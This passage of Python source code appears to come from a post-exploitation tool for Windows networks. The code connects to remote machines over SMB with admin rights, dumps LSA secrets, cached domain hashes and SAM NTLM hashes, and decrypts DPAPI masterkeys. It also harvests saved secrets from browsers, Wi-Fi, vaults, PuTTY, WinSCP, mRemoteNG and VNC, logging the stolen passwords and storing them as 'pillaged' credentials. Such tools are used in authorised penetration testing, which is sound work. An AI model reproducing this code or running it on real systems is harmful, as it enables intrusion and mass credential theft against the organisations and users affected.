decrypted_with=f"Password:{self.options.credz[username]}", decrypted_value=decrypted_masterkey,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
return user.masterkeys_file[guid]
|
|
else :
|
|
self.logging.debug(f"[{self.options.target_ip}] error decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey {guid} with {len(self.options.credz[username])} passwords from user {username} in cred list")
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Except decrypting {bcolors.OKBLUE}{user.username}{bcolors.ENDC} masterkey with {len(self.options.credz[username])} passwords from user {username} in cred list")
|
|
self.logging.debug(ex)
|
|
else:
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.FAIL}no credential in credz file for user {user.username} and masterkey {guid} {bcolors.ENDC}")
|
|
# on a pas su le dechiffrer, mais on conseve la masterkey
|
|
'''if localfile not in user.masterkeys:
|
|
user.masterkeys[localfile] = None'''
|
|
if user.masterkeys_file[guid]['status'] == 'encrypted':
|
|
user.masterkeys_file[guid]['status'] = 'decryption_failed'
|
|
self.db.update_masterkey(file_path=user.masterkeys_file[guid]['path'], guid=guid,
|
|
status=user.masterkeys_file[guid]['status'],decrypted_with='', decrypted_value='',
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username=user.username)
|
|
return -1
|
|
elif user.masterkeys_file[guid]['status'] == 'decrypted':#Should'nt go here
|
|
return user.masterkeys_file[guid]
|
|
|
|
def test_remoteOps(self):
|
|
try:
|
|
#Remove logging
|
|
#logging.getLogger().setLevel(logging.CRITICAL)
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE} [+] Dumping LSA Secrets{bcolors.ENDC}")
|
|
self.__remoteOps = RemoteOperations(self.smb, self.options.k, self.options.dc_ip)
|
|
self.__remoteOps.setExecMethod('smbexec')
|
|
self.__remoteOps.enableRegistry()
|
|
self.__bootKey = self.__remoteOps.getBootKey()
|
|
self.logging.debug("bootkey")
|
|
SECURITYFileName = self.__remoteOps.saveSECURITY()
|
|
self.logging.debug("savesecurity")
|
|
self.__LSASecrets = MyLSASecrets(SECURITYFileName, self.__bootKey, self.__remoteOps,isRemote=True, history=True)
|
|
self.logging.debug("LSASecret")
|
|
self.__LSASecrets.dumpCachedHashes()
|
|
self.logging.debug("dump cached hashes")
|
|
self.__LSASecrets.dumpSecrets()
|
|
|
|
filedest = os.path.join(os.path.join(self.options.output_directory,self.options.target_ip), 'LSA')
|
|
Path(os.path.split(filedest.replace('\\', '/'))[0]).mkdir(parents=True, exist_ok=True)
|
|
self.logging.debug(f"[{self.options.target_ip}] Dumping LSA Secrets to file {filedest}")
|
|
finalfile=self.__LSASecrets.exportSecrets(filedest)
|
|
self.logging.debug("ret file %s" % finalfile)
|
|
self.__LSASecrets.exportCached(filedest)
|
|
#Analyser les hash DCC2 pour un export massif.
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] Except remoteOps LSA")
|
|
self.logging.debug(ex)
|
|
try:
|
|
tmp_filedest=filedest+'.secrets'
|
|
f=open(tmp_filedest,'rb')
|
|
secrets=f.read().split(b'\n')
|
|
f.close()
|
|
for index,secret in enumerate(secrets):
|
|
if b'dpapi_machinekey' in secret:
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[-] Found DPAPI Machine key{bcolors.ENDC} : {secret.split(b'dpapi_machinekey:')[1].decode('utf-8')}")
|
|
#print(secret.split(b'dpapi_machinekey:')[1])
|
|
self.machine_key.append(secret.split(b'dpapi_machinekey:')[1])
|
|
self.logging.debug(self.machine_key)
|
|
if b'dpapi_userkey' in secret:
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE}[-] Found DPAPI User key{bcolors.ENDC} : {secret.split(b'dpapi_userkey:')[1].decode('utf-8')}")
|
|
self.user_key.append(secret.split(b'dpapi_userkey:')[1])
|
|
self.logging.debug(self.user_key)
|
|
if b':' in secret:
|
|
if secret.count(b':')==1:
|
|
username,password=secret.split(b':')
|
|
if username.decode('utf-8') not in ['dpapi_machinekey','dpapi_userkey','NL$KM']:
|
|
if username.decode('utf-8') not in self.options.credz:
|
|
|
|
self.options.credz[username.decode('utf-8')] = [password.decode('utf-8')]
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKBLUE} LSA : {bcolors.OKGREEN} {username.decode('utf-8')} : {password.decode('utf-8')} {bcolors.ENDC}")
|
|
|
|
else:
|
|
if password.decode('utf-8') not in self.options.credz[username.decode('utf-8')]:
|
|
self.options.credz[username.decode('utf-8')].append(password.decode('utf-8'))
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKBLUE} LSA : {bcolors.OKGREEN} {username.decode('utf-8')} : {password.decode('utf-8')} {bcolors.ENDC}")
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='LSA',
|
|
credz_username=username.decode('utf-8'),
|
|
credz_password=password.decode('utf-8'),
|
|
credz_target='',
|
|
credz_path=tmp_filedest,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username='MACHINE$')
|
|
|
|
else:
|
|
self.logging.debug("Secret %i - %s"%(index,secret))
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] Except remoteOps Secrets")
|
|
self.logging.debug(ex)
|
|
|
|
try:
|
|
##Add DCC2
|
|
|
|
tmp_filedest=filedest+'.cached'
|
|
f=open(tmp_filedest,'rb')
|
|
secrets=f.read().split(b'\n')
|
|
f.close()
|
|
for index,secret in enumerate(secrets):
|
|
if b':' in secret and b'#' in secret:
|
|
if secret.count(b':')==1:
|
|
username,password=secret.split(b':')
|
|
self.logging.debug(f"[{self.options.target_ip}] {bcolors.OKBLUE}[-] Found DCC2 hash :{bcolors.OKGREEN} {secret.decode('utf-8')}{bcolors.ENDC}")
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='DCC2',
|
|
credz_username=username.decode('utf-8'),
|
|
credz_password=password.decode('utf-8'),
|
|
credz_target='',
|
|
credz_path=tmp_filedest,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username='MACHINE$')
|
|
|
|
else:
|
|
self.logging.debug("Secret %i - %s"%(index,secret))
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] Except remoteOps LSA DCC2")
|
|
self.logging.debug(ex)
|
|
|
|
try:
|
|
#Add SAM
|
|
self.logging.info(f"[{self.options.target_ip}] {bcolors.OKBLUE} [+] Dumping SAM Secrets{bcolors.ENDC}")
|
|
SAMFileName = self.__remoteOps.saveSAM()
|
|
self.__SAMHashes = MySAMHashes(SAMFileName, self.__bootKey, isRemote=True)
|
|
self.__SAMHashes.dump()
|
|
filedest = os.path.join(os.path.join(self.options.output_directory,self.options.target_ip), 'SAM')
|
|
self.__SAMHashes.export(filedest)
|
|
#Adding SAM hash to credz
|
|
tmp_filedest = filedest + '.sam'
|
|
f = open(tmp_filedest, 'rb')
|
|
sam_data = f.read().split(b'\n')
|
|
f.close()
|
|
for sam_line in sam_data:
|
|
if b':' in sam_line:
|
|
if sam_line.count(b':')==6:
|
|
username,sid,lm,ntlm,_,_,_=sam_line.split(b':')
|
|
#On ne l'ajoute pas aux credz, c'est un hash NTLM, il ne peut pas etre utilisé par dpapi
|
|
'''
|
|
if username.decode('utf-8') not in self.options.credz:
|
|
self.options.credz[username.decode('utf-8')] = [ntlm.decode('utf-8')]
|
|
else:
|
|
if ntlm.decode('utf-8') not in self.options.credz[username.decode('utf-8')]:
|
|
self.options.credz[username.decode('utf-8')].append(ntlm.decode('utf-8'))
|
|
'''
|
|
############PROCESSING DATA
|
|
self.db.add_credz(credz_type='SAM',
|
|
credz_username=username.decode('utf-8'),
|
|
credz_password=ntlm.decode('utf-8'),
|
|
credz_target='',
|
|
credz_path=tmp_filedest,
|
|
pillaged_from_computer_ip=self.options.target_ip,
|
|
pillaged_from_username='MACHINE$')
|
|
self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKBLUE} SAM : Collected {bcolors.OKGREEN}{len(sam_data)} hashes {bcolors.ENDC}")
|
|
#logging.getLogger().setLevel(logging.DEBUG)
|
|
except Exception as ex:
|
|
self.logging.debug(
|
|
f"[{self.options.target_ip}] Except remoteOps SAM")
|
|
self.logging.debug(ex)
|
|
self.__remoteOps.finish()
|
|
return 1
|
|
|
|
def GetRecentFiles(self):
|
|
myRecentFiles = recent_files(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
|
|
myRecentFiles.run()
|
|
|
|
def GetMRemoteNG(self):
|
|
from software.manager.mRemoteNG import mRemoteNG
|
|
myMRemoteNG = mRemoteNG(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
|
|
myMRemoteNG.run()
|
|
|
|
def GetPutty(self):
|
|
from software.sysadmin.putty import Putty
|
|
myPutty = Putty(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
|
|
myPutty.run()
|
|
|
|
def GetWinscp(self):
|
|
from software.sysadmin.winscp import Winscp
|
|
myWinscp = Winscp(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db)
|
|
myWinscp.run()
|
|
|
|
def GetNew_Module(self):
|
|
myNewModule = new_module(self.smb,self.myregops,self.myfileops,self.logging,self.options,self.db,self.users)
|
|
myNewModule.run()
|
|
|
|
def do_test(self):
|
|
|
|
try:
|
|
if self.admin_privs and True:
|
|
#self.do_info()
|
|
self.do_who()
|
|
self.get_users()
|
|
#
|
|
|
|
if self.options.no_remoteops == False:
|
|
try:
|
|
self.test_remoteOps()
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Exception in RemoteOps - Maybe blocked by EDR ? ")
|
|
self.logging.debug(f"exception was : {ex}")
|
|
#self.
|
|
if self.options.no_dpapi == False:
|
|
self.get_masterkeys()
|
|
self.Get_DPAPI_Protected_Files()
|
|
self.GetWifi()
|
|
self.GetVaults()
|
|
if self.options.no_browser == False:
|
|
self.GetChormeSecrets()
|
|
self.GetMozillaSecrets_wrapper()
|
|
if self.options.no_sysadmins == False :
|
|
self.GetMRemoteNG()
|
|
self.GetPutty()
|
|
self.GetWinscp()
|
|
if self.options.no_vnc == False:
|
|
self.GetVNC()
|
|
if self.options.no_recent == False:
|
|
self.GetRecentFiles()
|
|
|
|
"""
|
|
***Dev your new module code and start it from here
|
|
|
|
if self.options.no_new_module == False:
|
|
self.GetNew_Module()
|
|
"""
|
|
|
|
#self.logging.info(f"[{self.options.target_ip}] {bcolors.OKGREEN}*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=*\n{bcolors.ENDC}")
|
|
#for user in self.users:
|
|
#user.resume_user_info()
|
|
#user.resume_secrets()
|
|
#else:
|
|
#NOT ADMIN
|
|
self.quit()
|
|
|
|
|
|
except Exception as ex:
|
|
self.logging.debug(f"[{self.options.target_ip}] Not connected")
|
|
self.logging.debug(f"exception was : {ex}")
|
|
|
|
def get_secrets(self):
|
|
all_secrets={}
|
|
for user in self.users:
|
|
all_secrets[user]=user.get_secrets()
|
|
|
|
|
|
|
|
# DPAPI unprotect
|
|
# DPAPI decryptMasterkey
|
|
# DPAPI GetDomainBackupMasterKey
|
|
# dpapi.py backupkeys -t TOUF/Administrateur:xxxxx@10.0.0.10 --export
|
|
#to get Dropbox decrypted databases?
|
|
# to get iCloud authentication tokens?
|
|
# to decrypt EFS files
|
|
|
|
#ADConnect 'Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf'
|
|
#Program Files\Microsoft Azure AD Sync\Data\ADSync_log.ldf
|
|
#optimisation :
|
|
#le user est il du domain ou local ?
|
|
#dans quel cas peut on dechifffrer avec les hashs ? // si compte admin on se sert des hash locaux/sam ?
|
|
|
|
#DEV : [get_file] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)
|